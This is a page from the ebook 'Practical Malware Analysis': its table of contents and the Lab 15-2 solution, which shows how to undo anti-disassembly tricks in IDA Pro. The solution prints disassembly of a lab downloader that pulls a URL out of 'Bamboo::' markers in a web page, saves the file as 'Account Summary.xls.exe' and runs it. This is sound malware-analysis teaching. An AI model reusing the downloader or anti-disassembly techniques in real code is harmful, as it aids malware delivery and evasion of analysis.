Table of Contents for
Practical Malware Analysis

Version ebook / Retour

Cover image for bash Cookbook, 2nd Edition Practical Malware Analysis by Andrew Honig Published by No Starch Press, 2012
  1. Cover
  2. Practical Malware Analysis: The Hands-On Guide to Dissecting Malicious Software
  3. Praise for Practical Malware Analysis
  4. Warning
  5. About the Authors
  6. About the Technical Reviewer
  7. About the Contributing Authors
  8. Foreword
  9. Acknowledgments
  10. Individual Thanks
  11. Introduction
  12. What Is Malware Analysis?
  13. Prerequisites
  14. Practical, Hands-On Learning
  15. What’s in the Book?
  16. 0. Malware Analysis Primer
  17. The Goals of Malware Analysis
  18. Malware Analysis Techniques
  19. Types of Malware
  20. General Rules for Malware Analysis
  21. I. Basic Analysis
  22. 1. Basic Static Techniques
  23. Antivirus Scanning: A Useful First Step
  24. Hashing: A Fingerprint for Malware
  25. Finding Strings
  26. Packed and Obfuscated Malware
  27. Portable Executable File Format
  28. Linked Libraries and Functions
  29. Static Analysis in Practice
  30. The PE File Headers and Sections
  31. Conclusion
  32. Labs
  33. 2. Malware Analysis in Virtual Machines
  34. The Structure of a Virtual Machine
  35. Creating Your Malware Analysis Machine
  36. Using Your Malware Analysis Machine
  37. The Risks of Using VMware for Malware Analysis
  38. Record/Replay: Running Your Computer in Reverse
  39. Conclusion
  40. 3. Basic Dynamic Analysis
  41. Sandboxes: The Quick-and-Dirty Approach
  42. Running Malware
  43. Monitoring with Process Monitor
  44. Viewing Processes with Process Explorer
  45. Comparing Registry Snapshots with Regshot
  46. Faking a Network
  47. Packet Sniffing with Wireshark
  48. Using INetSim
  49. Basic Dynamic Tools in Practice
  50. Conclusion
  51. Labs
  52. II. Advanced Static Analysis
  53. 4. A Crash Course in x86 Disassembly
  54. Levels of Abstraction
  55. Reverse-Engineering
  56. The x86 Architecture
  57. Conclusion
  58. 5. IDA Pro
  59. Loading an Executable
  60. The IDA Pro Interface
  61. Using Cross-References
  62. Analyzing Functions
  63. Using Graphing Options
  64. Enhancing Disassembly
  65. Extending IDA with Plug-ins
  66. Conclusion
  67. Labs
  68. 6. Recognizing C Code Constructs in Assembly
  69. Global vs. Local Variables
  70. Disassembling Arithmetic Operations
  71. Recognizing if Statements
  72. Recognizing Loops
  73. Understanding Function Call Conventions
  74. Analyzing switch Statements
  75. Disassembling Arrays
  76. Identifying Structs
  77. Analyzing Linked List Traversal
  78. Conclusion
  79. Labs
  80. 7. Analyzing Malicious Windows Programs
  81. The Windows API
  82. The Windows Registry
  83. Networking APIs
  84. Following Running Malware
  85. Kernel vs. User Mode
  86. The Native API
  87. Conclusion
  88. Labs
  89. III. Advanced Dynamic Analysis
  90. 8. Debugging
  91. Source-Level vs. Assembly-Level Debuggers
  92. Kernel vs. User-Mode Debugging
  93. Using a Debugger
  94. Exceptions
  95. Modifying Execution with a Debugger
  96. Modifying Program Execution in Practice
  97. Conclusion
  98. 9. OllyDbg
  99. Loading Malware
  100. The OllyDbg Interface
  101. Memory Map
  102. Viewing Threads and Stacks
  103. Executing Code
  104. Breakpoints
  105. Loading DLLs
  106. Tracing
  107. Exception Handling
  108. Patching
  109. Analyzing Shellcode
  110. Assistance Features
  111. Plug-ins
  112. Scriptable Debugging
  113. Conclusion
  114. Labs
  115. 10. Kernel Debugging with WinDbg
  116. Drivers and Kernel Code
  117. Setting Up Kernel Debugging
  118. Using WinDbg
  119. Microsoft Symbols
  120. Kernel Debugging in Practice
  121. Rootkits
  122. Loading Drivers
  123. Kernel Issues for Windows Vista, Windows 7, and x64 Versions
  124. Conclusion
  125. Labs
  126. IV. Malware Functionality
  127. 11. Malware Behavior
  128. Downloaders and Launchers
  129. Backdoors
  130. Credential Stealers
  131. Persistence Mechanisms
  132. Privilege Escalation
  133. Covering Its Tracks—User-Mode Rootkits
  134. Conclusion
  135. Labs
  136. 12. Covert Malware Launching
  137. Launchers
  138. Process Injection
  139. Process Replacement
  140. Hook Injection
  141. Detours
  142. APC Injection
  143. Conclusion
  144. Labs
  145. 13. Data Encoding
  146. The Goal of Analyzing Encoding Algorithms
  147. Simple Ciphers
  148. Common Cryptographic Algorithms
  149. Custom Encoding
  150. Decoding
  151. Conclusion
  152. Labs
  153. 14. Malware-Focused Network Signatures
  154. Network Countermeasures
  155. Safely Investigate an Attacker Online
  156. Content-Based Network Countermeasures
  157. Combining Dynamic and Static Analysis Techniques
  158. Understanding the Attacker’s Perspective
  159. Conclusion
  160. Labs
  161. V. Anti-Reverse-Engineering
  162. 15. Anti-Disassembly
  163. Understanding Anti-Disassembly
  164. Defeating Disassembly Algorithms
  165. Anti-Disassembly Techniques
  166. Obscuring Flow Control
  167. Thwarting Stack-Frame Analysis
  168. Conclusion
  169. Labs
  170. 16. Anti-Debugging
  171. Windows Debugger Detection
  172. Identifying Debugger Behavior
  173. Interfering with Debugger Functionality
  174. Debugger Vulnerabilities
  175. Conclusion
  176. Labs
  177. 17. Anti-Virtual Machine Techniques
  178. VMware Artifacts
  179. Vulnerable Instructions
  180. Tweaking Settings
  181. Escaping the Virtual Machine
  182. Conclusion
  183. Labs
  184. 18. Packers and Unpacking
  185. Packer Anatomy
  186. Identifying Packed Programs
  187. Unpacking Options
  188. Automated Unpacking
  189. Manual Unpacking
  190. Tips and Tricks for Common Packers
  191. Analyzing Without Fully Unpacking
  192. Packed DLLs
  193. Conclusion
  194. Labs
  195. VI. Special Topics
  196. 19. Shellcode Analysis
  197. Loading Shellcode for Analysis
  198. Position-Independent Code
  199. Identifying Execution Location
  200. Manual Symbol Resolution
  201. A Full Hello World Example
  202. Shellcode Encodings
  203. NOP Sleds
  204. Finding Shellcode
  205. Conclusion
  206. Labs
  207. 20. C++ Analysis
  208. Object-Oriented Programming
  209. Virtual vs. Nonvirtual Functions
  210. Creating and Destroying Objects
  211. Conclusion
  212. Labs
  213. 21. 64-Bit Malware
  214. Why 64-Bit Malware?
  215. Differences in x64 Architecture
  216. Windows 32-Bit on Windows 64-Bit
  217. 64-Bit Hints at Malware Functionality
  218. Conclusion
  219. Labs
  220. A. Important Windows Functions
  221. B. Tools for Malware Analysis
  222. C. Solutions to Labs
  223. Lab 1-1 Solutions
  224. Lab 1-2 Solutions
  225. Lab 1-3 Solutions
  226. Lab 1-4 Solutions
  227. Lab 3-1 Solutions
  228. Lab 3-2 Solutions
  229. Lab 3-3 Solutions
  230. Lab 3-4 Solutions
  231. Lab 5-1 Solutions
  232. Lab 6-1 Solutions
  233. Lab 6-2 Solutions
  234. Lab 6-3 Solutions
  235. Lab 6-4 Solutions
  236. Lab 7-1 Solutions
  237. Lab 7-2 Solutions
  238. Lab 7-3 Solutions
  239. Lab 9-1 Solutions
  240. Lab 9-2 Solutions
  241. Lab 9-3 Solutions
  242. Lab 10-1 Solutions
  243. Lab 10-2 Solutions
  244. Lab 10-3 Solutions
  245. Lab 11-1 Solutions
  246. Lab 11-2 Solutions
  247. Lab 11-3 Solutions
  248. Lab 12-1 Solutions
  249. Lab 12-2 Solutions
  250. Lab 12-3 Solutions
  251. Lab 12-4 Solutions
  252. Lab 13-1 Solutions
  253. Lab 13-2 Solutions
  254. Lab 13-3 Solutions
  255. Lab 14-1 Solutions
  256. Lab 14-2 Solutions
  257. Lab 14-3 Solutions
  258. Lab 15-1 Solutions
  259. Lab 15-2 Solutions
  260. Lab 15-3 Solutions
  261. Lab 16-1 Solutions
  262. Lab 16-2 Solutions
  263. Lab 16-3 Solutions
  264. Lab 17-1 Solutions
  265. Lab 17-2 Solutions
  266. Lab 17-3 Solutions
  267. Lab 18-1 Solutions
  268. Lab 18-2 Solutions
  269. Lab 18-3 Solutions
  270. Lab 18-4 Solutions
  271. Lab 18-5 Solutions
  272. Lab 19-1 Solutions
  273. Lab 19-2 Solutions
  274. Lab 19-3 Solutions
  275. Lab 20-1 Solutions
  276. Lab 20-2 Solutions
  277. Lab 20-3 Solutions
  278. Lab 21-1 Solutions
  279. Lab 21-2 Solutions
  280. Index
  281. Index
  282. Index
  283. Index
  284. Index
  285. Index
  286. Index
  287. Index
  288. Index
  289. Index
  290. Index
  291. Index
  292. Index
  293. Index
  294. Index
  295. Index
  296. Index
  297. Index
  298. Index
  299. Index
  300. Index
  301. Index
  302. Index
  303. Index
  304. Index
  305. Index
  306. Index
  307. Updates
  308. About the Authors
  309. Copyright

Lab 15-2 Solutions

Short Answers

  1. The URL initially requested is http://www.practicalmalwareanalysis.com/bamboo.html.

  2. The User-Agent string is generated by adding 1 to each letter and number in the hostname (Z and 9 are rotated to A and 0).

  3. The program looks for the string Bamboo:: in the page it requested.

  4. The program searches beyond the Bamboo:: string to find an additional ::, which it converts to a NULL terminator. The string in between Bamboo and the terminator is downloaded to a file named Account Summary.xls.exe and executed.

Detailed Analysis

Open the binary with IDA Pro and scroll to the main function at offset 0x00401000. We will begin with disarming this function by reading it top to bottom, fixing each countermeasure until we reach the logical end of the function. The first countermeasure we encounter is shown in Example C-122 at address 0x0040115A.

Example C-122. False conditional

0040115A           test    esp, esp
0040115C           jnz     short near ptr loc_40115E+1 
0040115E
0040115E loc_40115E:                             ; CODE XREF: 0040115Cj
0040115E           jmp     near ptr 0AA11CDh 
0040115E ; ----------------------------------------------------------------------
00401163            db 6Ah
00401164            dd 0E8006A00h, 21Ah, 5C858B50h, 50FFFEFDh, 206415FFh, 85890040h
00401164            dd 0FFFFFD64h, 0FD64BD83h, 7400FFFFh, 0FC8D8D24h, 51FFFFFEh

The listing shows a false conditional used by the jnz instruction at . The jump will always be taken because the value of ESP will always be nonzero at this point in the program. The ESP register is never loaded with a specific value, but it must be nonzero for a normal functioning Win32 application.

The target of the jump lies within the 5-byte jmp instruction at . Turn this instruction into data by putting your cursor at and pressing D on the keyboard. Then put your cursor on the jump target line 0x0040115F and press C to turn the line into code.

We continue reading the code until we encounter the anti-disassembly countermeasure at line 0x004011D0. This is a simple false conditional based on a jz following an xor eax, eax instruction. Correct this disassembly in the same fashion as in Lab 15-1 Solutions. Be sure to continue turning bytes into code so it reads clearly. Continue reading the code until you come to the next countermeasure at line 0x00401215, which is shown in Example C-123.

Example C-123. jmp into itself

00401215 loc_401215:                             ; CODE XREF: loc_401215j
00401215 EB FF           jmp     short near ptr loc_401215+1

At is a 2-byte jmp instruction whose target is the second byte of itself. The second byte is the first byte of the next instruction. Turn this instruction into data and put your cursor on the second byte, location 0x00401216, and turn it into code. To force IDA Pro to produce a clean graph, turn the first byte of the jmp instruction (0xEB) into a NOP. If you are using the commercial version of IDA Pro, select File ▸ Python command, enter PatchByte(0x401215, 0x90) into the text box, and click OK. Now put your cursor on the location 0x00401215, which should contain the value db 90h, and convert it to code by pressing the C key.

Continue reading the code until you reach the next countermeasure at line 0x00401269, which is shown in Example C-124.

Example C-124. False conditionals with the same target

00401269                 jz      short near ptr loc_40126D+1 
0040126B                 jnz     short near ptr loc_40126D+1 
0040126D
0040126D loc_40126D:                             ; CODE XREF: 00401269j
0040126D                                         ; 0040126Bj
0040126D                 call    near ptr 0FF3C9FFFh 

Example C-124 shows a false conditional based on putting both halves of a conditional branch back-to-back ( and ) and pointing at the same target. The same target for jnz and jz means that the countermeasure does not depend on a specific state of the zero flag as either set or unset in order to hit the target code. In this case, the target is in the middle of the call instruction on line 0x0040126D at . Convert this instruction to data by pressing the D key on the keyboard. Then put your cursor on line 0x0040126E to convert it to code with the C key.

Continue reading the code until you reach the next countermeasure at line 0x004012E6, which is shown in Example C-125.

Example C-125. False conditionals into the middle of the previous instruction

004012E6                loc_4012E6:                     ; CODE XREF: 004012ECj
004012E6 66 B8 EB 05                    mov     ax, 5EBh 
004012EA 31 C0                          xor     eax, eax
004012EC 74 FA                          jz      short near ptr loc_4012E6+2 
004012EE E8 6A 0A 6A 00                 call    near ptr 0AA1D5Dh

Example C-125 shows an advanced countermeasure that involves a false conditional jump into the middle of a previous instruction as seen with the upward-jumping jz at . This jumps into the middle of the mov instruction at .

It is impossible to have the disassembler show all the instructions that are executed in this case because the opcodes are used twice, so just follow the code logically and convert each instruction to code as you reach it. When you are finished with this countermeasure, it should look like the code in Example C-126. At , we see the middle of the mov instruction from the previous listing converted to a proper jmp instruction.

Example C-126. Manually repaired anti-disassembly code

004012E6 66                             db 66h
004012E7 B8                             db 0B8h ; +
004012E8            ; ------------------------------------------------------------
004012E8
004012E8                loc_4012E8:               ; CODE XREF: 004012ECj
004012E8 EB 05                          jmp     short loc_4012EF 
004012EA            ; ------------------------------------------------------------
004012EA 31 C0                          xor     eax, eax
004012EC 74 FA                          jz      short loc_4012E8
004012EC            ; ------------------------------------------------------------
004012EE E8                             db 0E8h 
004012EF            ; ------------------------------------------------------------
004012EF
004012EF                loc_4012EF:              ; CODE XREF: loc_4012E8j
004012EF 6A 0A                          push    0Ah

You can convert all the extra db bytes (like the one shown at ) to NOPs using the IDA Python PatchByte option described after Example C-123. This will allow you to create a proper function within IDA Pro. To create a function, after patching the NOPs, select all the code from the retn instruction on line 0x0040130E to the beginning of the function at 0x00401000, and press the P key. To view the resulting function graphically, press the spacebar.

The two functions (sub_40130F and sub_401386) immediately follow the main function. Each builds a string on the stack, duplicating it to the heap with strdup, and returns a pointer to the heap string. The malware author crafted this function to build the string so that it will not show up as a plaintext string in the binary, but will appear only in memory at runtime. The first of these two functions produces the string http://www.practicalmalwareanalysis.com/bamboo.html, and the second produces the string Account Summary.xls.exe. Having defeated all the anti-disassembly countermeasures in the main function, these functions should show cross-references to where they are called from the main function. Rename these functions buildURL and buildFilename by putting your cursor on the function name and pressing the N key on the keyboard.

Example C-127 shows the call to buildURL (our renamed function) at .

Example C-127. Opening the http://www.practicalmalwareanalysis.com/bamboo.html URL

0040115F                 push    0
00401161                 push    0
00401163                 push    0
00401167                 push    0
0040116C                 call    buildURL 
0040116D                 push    eax
00401173                 mov     edx, [ebp+var_10114]
00401174                 push    edx
0040117A                 call    ds:InternetOpenUrlA 

Reading the code further, we see that it attempts to open the bamboo.html URL returned from buildURL at using InternetOpenUrlA. In order to determine the User-Agent string used by the malware when calling the InternetOpenUrlA function, we need to first find the InternetOpen function call and determine what data is passed to it. Earlier in the function, we see InternetOpenA called, as shown in Example C-128.

Example C-128. Setting up the connection via InternetOpenA

0040113F                 push    0
00401141                 push    0
00401143                 push    0
00401145                 push    1
00401147                 lea     ecx, [ebp+name] 
0040114D                 push    ecx 
0040114E                 call    ds:InternetOpenA

The first argument to InternetOpenA at is the User-Agent string. ECX is pushed as this argument, and the lea instruction loads it with a pointer to a location on the stack. IDA Pro’s stack frame analysis has named this location name, as seen at . We must scroll up in the function to see where name is getting populated. Near the beginning of the function, shown in Example C-129, we see a reference to the name location at .

Example C-129. Using gethostname to get the local machine’s name

00401047                 push    100h            ; namelen
0040104C                 lea     eax, [ebp+name] 
00401052                 push    eax             ; name
00401053                 call    ds:gethostname

The gethostname function will populate a buffer with the hostname of the local machine. Based on Example C-129, you might be tempted to conclude that the User-Agent string will be the hostname, but you would be only partially correct. In fact, careful examination of the code between locations 0x00401073 and 0x0040113F (not shown here) reveals a loop that is responsible for modifying each letter or number within the hostname by incrementing it by one before using it as the User-Agent. (The letter and number at the end, Z and 9, are reset to A and 0.)

Following the call to InternetOpenA and the first call to InternetOpenUrlA, the data (an HTML web page) is downloaded to a local buffer with a call to InternetReadFile, as shown in Example C-130 at . The buffer to contain the data is the second argument, which has been named automatically by IDA Pro as Str at . A few lines down in the function, we see the Str buffer accessed again at .

Example C-130. Reading and parsing the downloaded HTML

0040118F                 push    eax
00401190                 push    0FFFFh
00401195                 lea     ecx, [ebp+Str] 
0040119B                 push    ecx
0040119C                 mov     edx, [ebp+var_10C]
004011A2                 push    edx
004011A3                 call    ds:InternetReadFile 
...
004011D5                 push    offset SubStr   ; "Bamboo::"
004011DA                 lea     ecx, [ebp+Str] 
004011E0                 push    ecx             ; Str
004011E1                 call    ds:strstr 

The strstr function at is used to find a substring within a larger string. In this case, it is finding the string Bamboo:: within the buffer Str, which contains all the data we retrieved from the initial URL. The code immediately following the strstr call is shown in Example C-131.

Example C-131. Parsing a string separated by Bamboo:: and ::

004011E7                 add     esp, 8
004011EA                 mov     [ebp+var_108], eax 
004011F0                 cmp     [ebp+var_108], 0
004011F7                 jz      loc_401306
004011FD                 push    offset asc_40303C ; "::"
00401202                 mov     edx, [ebp+var_108]
00401208                 push    edx             ; Str
00401209                 call    ds:strstr 
0040120F                 add     esp, 8
00401212                 mov     byte ptr [eax], 0 
...
00401232                 mov     eax, [ebp+var_108]
00401238                 add     eax, 8 
0040123E                 mov     [ebp+var_108], eax

As you can see, the pointer to the string Bamboo:: found within the downloaded HTML is stored in var_108 at . A second call to strstr, seen at , is called to search for the next ::. Once two colons are found, the code at replaces the first colon with a NULL, which is designed to terminate the string that is contained in between Bamboo:: and ::.

The pointer stored at var_108 is incremented by eight at . This happens to be the exact string length of Bamboo::, which is what the pointer is referencing. After this operation, the pointer will reference whatever followed the colons. Since the code already found the trailing colons and substituted them with a NULL, we now have a proper NULL-terminated string for whatever was in between Bamboo:: and :: stored in var_108.

Immediately following the string-parsing code, we see var_108 used at in Example C-132.

Example C-132. Opening another URL in order to download more malware

00401247                 push    0
00401249                 push    0
0040124B                 push    0
0040124D                 push    0
0040124F                 mov     ecx, [ebp+var_108] 
00401255                 push    ecx
00401256                 mov     edx, [ebp+var_10114]
0040125C                 push    edx
0040125D                 call    ds:InternetOpenUrlA

The second argument (var_108) to InternetOpenUrlA is the URL to open. Therefore, the data in between the Bamboo:: and the trailing colons is intended to be a URL for the program to download. Analysis of the code between lines 0x0040126E and 0x004012E3 (not shown here), reveals that the URL opened in Example C-132 is downloaded to the file Account Summary.xls.exe, which is then launched by a call to ShellExecute on line 0x00401300.